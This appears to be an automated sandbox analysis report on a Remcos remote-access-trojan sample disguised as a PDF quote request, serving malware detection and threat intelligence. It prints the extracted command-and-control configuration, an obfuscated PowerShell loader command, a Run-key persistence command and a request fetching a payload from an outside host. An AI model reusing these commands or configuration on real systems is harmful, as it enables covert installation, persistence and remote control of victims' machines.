Analysis
-
max time kernel
26s -
max time network
26s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
30/08/2024, 13:43 UTC
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-278TR8-EGUY-PDF.exe
Resource
win7-20240729-en
General
-
Target
RFQ-278TR8-EGUY-PDF.exe
-
Size
566KB
-
MD5
da86655a0232359a727a091ace033894
-
SHA1
c5ba96e3b7f3ca40364d93852c49810c9ced5d90
-
SHA256
ef5e922e7e1dc762301001557f0132d702b9f927efca9f70c91fd719ea1652a2
-
SHA512
a58e76d31ce56e8b007518923599c2cd8cd9ec419f5cb930e2fe429e1a28256490a599d32b04cee7ca921b1e48b8c326440eade966fde62ac882e32d0494a868
-
SSDEEP
12288:/TYbpC/5wByfpr4t6ssVfKF34YDc7L8lkflIQB5YT07KchD8ISNq3H:/TYdg5wByfp0UVW4YVl2I+5nKchDxSN4
Malware Config
Extracted
remcos
RemoteHost
45.95.169.175:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-W6BTEW
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\\tugthuskandidaters\\').Oxyderer;%Waylin% ($Brneblad)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2980 ImagingDevices.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2576 powershell.exe 2980 ImagingDevices.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2576 set thread context of 2980 2576 powershell.exe 32 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\backland\Francettes.aft RFQ-278TR8-EGUY-PDF.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\daddies\anodiseredes.ini RFQ-278TR8-EGUY-PDF.exe -
pid Process 2576 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ImagingDevices.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RFQ-278TR8-EGUY-PDF.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2216 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2576 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2532 wrote to memory of 2576 2532 RFQ-278TR8-EGUY-PDF.exe 29 PID 2532 wrote to memory of 2576 2532 RFQ-278TR8-EGUY-PDF.exe 29 PID 2532 wrote to memory of 2576 2532 RFQ-278TR8-EGUY-PDF.exe 29 PID 2532 wrote to memory of 2576 2532 RFQ-278TR8-EGUY-PDF.exe 29 PID 2576 wrote to memory of 2980 2576 powershell.exe 32 PID 2576 wrote to memory of 2980 2576 powershell.exe 32 PID 2576 wrote to memory of 2980 2576 powershell.exe 32 PID 2576 wrote to memory of 2980 2576 powershell.exe 32 PID 2576 wrote to memory of 2980 2576 powershell.exe 32 PID 2576 wrote to memory of 2980 2576 powershell.exe 32 PID 2980 wrote to memory of 1512 2980 ImagingDevices.exe 33 PID 2980 wrote to memory of 1512 2980 ImagingDevices.exe 33 PID 2980 wrote to memory of 1512 2980 ImagingDevices.exe 33 PID 2980 wrote to memory of 1512 2980 ImagingDevices.exe 33 PID 1512 wrote to memory of 2216 1512 cmd.exe 35 PID 1512 wrote to memory of 2216 1512 cmd.exe 35 PID 1512 wrote to memory of 2216 1512 cmd.exe 35 PID 1512 wrote to memory of 2216 1512 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe"C:\Users\Admin\AppData\Local\Temp\RFQ-278TR8-EGUY-PDF.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized " $Bestikke=Get-Content 'C:\Users\Admin\AppData\Roaming\daniel\bughinders\cobia\Untraced.Unn';$Slambassinernes=$Bestikke.SubString(53011,3);.$Slambassinernes($Bestikke)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Waylin% -windowstyle minimized $Brneblad=(Get-ItemProperty -Path 'HKCU:\tugthuskandidaters\').Oxyderer;%Waylin% ($Brneblad)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2216
-
-
-
-
Network
-
Remote address:8.8.8.8:53Requestasjstudio.clIN AResponseasjstudio.clIN A201.148.104.39
-
Remote address:8.8.8.8:53Requestasjstudio.clIN A
-
Remote address:201.148.104.39:80RequestGET /cXKaAfOrdfcYdKPug104.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: asjstudio.cl
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Thu, 29 Aug 2024 08:59:18 GMT
Accept-Ranges: bytes
Content-Length: 494656
Content-Type: application/octet-stream
-
9.1kB 509.6kB 189 368
HTTP Request
GET http://asjstudio.cl/cXKaAfOrdfcYdKPug104.binHTTP Response
200
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33B
MD5d1146584cebab9c03dcaf52946f7a18c
SHA1cd0452fef7a4ad38b8c70895a487ecac54430fc1
SHA256630fb379230acf901b24a7e57cd31bd6b7a0b054e8e265b6f7ae6b7220cf41c2
SHA512044f3c344e47cf298b69541c5337b767f0bcca3819caff7ad68f24da72bfe36cd5dc54261b07ff2c2338ea75873523fd29b97cb728f9dde6a0882d6855273092
-
Filesize
313KB
MD54868e8f6d3c4a685c65a0af8b88e33a2
SHA1076a7cce739a778df2088a77a2978f8f8bad2bad
SHA25665ae30c7a987b8b3ebbc96969343ae59033c9817a3683ebb5ac999bed93cb2ab
SHA5129eb1c07208756befa71fdcc29be30d4ea73e3d48a9828eeb78e1851a9e287220d3e2e55aef49cc0e3ad883ef4f427367b740fb21d65b7b0e4c9e3cd5479b2814
-
Filesize
51KB
MD5bbb124a1a42a8499a391dafad534321c
SHA138143905e4011753b569f3b0a0e4ba4c90a3d02c
SHA256fccbcb9907193676c4840c9ab08ecec0058b9e650efc4971dd0d92fd15b575b5
SHA51201449caa6effed3f6502d5c980f9a5683d2eb99dc247d29dbb79c9737c8f59a6dc5ee787ba0ad75ab6ba2f3b8db048fd4cd76765c704b6ae76fe4e190f1b8669